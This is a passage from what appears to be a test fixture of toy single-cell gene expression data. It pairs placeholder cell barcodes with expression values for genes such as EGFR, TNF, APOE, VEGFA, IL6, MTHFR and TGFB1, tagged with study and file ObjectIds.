"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"EGFR Expression": {
"name": "EGFR Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
2.81,
2.58,
2.0,
1.58,
3.0,
1.0,
2.0,
3.0,
2.81,
2.32,
2.0,
2.81,
2.81,
2.32,
2.0,
2.32,
2.81,
2.0,
2.81,
1.0,
2.32,
1.0,
1.58,
2.81,
2.58,
2.81,
2.0,
3.0,
3.0,
3.0,
1.58,
2.58,
1.0,
3.0,
2.81,
2.32,
3.0,
2.81,
2.0,
1.58,
2.58,
2.0,
2.58,
2.81,
3.0,
2.32,
2.81,
2.32,
2.58,
2.0,
2.0,
2.58,
2.81,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TNF Cells": {
"name": "TNF Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB7_BazMoo_5CBDCCDBCDBCDCCC-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TNF Expression": {
"name": "TNF Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
1.0,
2.32,
3.0,
2.0,
2.58,
2.58,
1.58,
2.81,
2.58,
2.81,
2.32,
2.32,
2.32,
2.32,
3.0,
3.0,
2.81,
3.0,
1.0,
3.0,
2.32,
2.81,
1.58,
2.58,
3.0,
2.0,
2.0,
3.0,
1.58,
1.0,
2.81,
2.0,
1.58,
1.58,
2.58,
2.32,
2.0,
3.0,
2.81,
2.0,
2.81,
2.58,
2.0,
2.0,
2.0,
2.81,
3.0,
2.81,
2.58,
1.58,
1.58,
1.0,
3.0,
2.58,
1.0,
2.81,
2.32,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"APOE Cells": {
"name": "APOE Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"APOE Expression": {
"name": "APOE Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.0,
1.0,
1.0,
2.58,
1.0,
2.0,
2.32,
2.58,
2.58,
2.58,
2.81,
2.0,
2.32,
2.58,
2.0,
2.0,
1.0,
2.0,
2.58,
2.32,
3.0,
2.0,
2.32,
1.0,
2.32,
1.0,
1.0,
1.0,
3.0,
1.58,
2.32,
2.0,
2.58,
3.0,
2.58,
1.0,
2.58,
2.0,
1.58,
2.58,
2.0,
2.81,
2.81,
1.58,
3.0,
2.81,
2.81,
1.58,
2.81,
1.0,
2.81,
2.0,
2.58,
3.0,
2.81,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"VEGFA Cells": {
"name": "VEGFA Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"VEGFA Expression": {
"name": "VEGFA Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.32,
2.0,
2.81,
2.58,
1.0,
3.0,
2.32,
1.0,
1.58,
2.81,
3.0,
3.0,
2.81,
2.81,
1.0,
2.81,
1.0,
2.32,
2.58,
3.0,
2.81,
2.58,
2.58,
2.0,
1.0,
2.32,
2.58,
2.32,
2.0,
1.0,
1.0,
1.0,
1.0,
3.0,
3.0,
3.0,
2.58,
2.81,
1.0,
3.0,
2.81,
2.58,
2.81,
3.0,
2.0,
2.32,
1.0,
3.0,
2.81,
1.58,
1.58,
3.0,
2.0,
2.58,
2.0,
1.0,
2.0,
2.81,
3.0,
1.0,
2.0,
2.81,
2.32,
3.0,
2.81,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IL6 Cells": {
"name": "IL6 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IL6 Expression": {
"name": "IL6 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
2.81,
2.0,
2.81,
2.81,
3.0,
2.32,
3.0,
2.32,
2.32,
3.0,
2.81,
2.58,
2.0,
2.32,
1.58,
2.0,
2.58,
2.58,
3.0,
2.32,
1.0,
1.58,
2.32,
1.58,
2.81,
2.81,
1.0,
2.32,
3.0,
1.58,
2.58,
3.0,
3.0,
2.0,
2.32,
2.58,
3.0,
2.0,
2.32,
2.0,
1.58,
1.0,
3.0,
1.58,
1.58,
2.58,
2.81,
1.58,
3.0,
2.32,
3.0,
1.0,
2.58,
2.58,
2.81,
3.0,
1.0,
2.0,
2.58,
2.32,
3.0,
1.58,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MTHFR Cells": {
"name": "MTHFR Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MTHFR Expression": {
"name": "MTHFR Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.81,
1.0,
2.81,
2.0,
1.58,
2.58,
1.0,
1.0,
1.58,
1.0,
3.0,
2.32,
2.32,
1.58,
2.81,
1.58,
2.0,
1.0,
2.58,
1.0,
1.0,
1.58,
2.32,
1.0,
2.0,
2.81,
2.32,
3.0,
1.58,
1.58,
3.0,
1.58,
1.0,
2.32,
1.58,
2.81,
2.0,
2.81,
2.81,
1.0,
3.0,
1.0,
2.81,
2.0,
2.0,
1.58,
2.32,
2.81,
2.58,
2.81,
2.58,
2.0,
2.81,
2.0,
1.58,
2.58,
2.0,
1.0,
2.81,
1.0,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TGFB1 Cells": {
"name": "TGFB1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
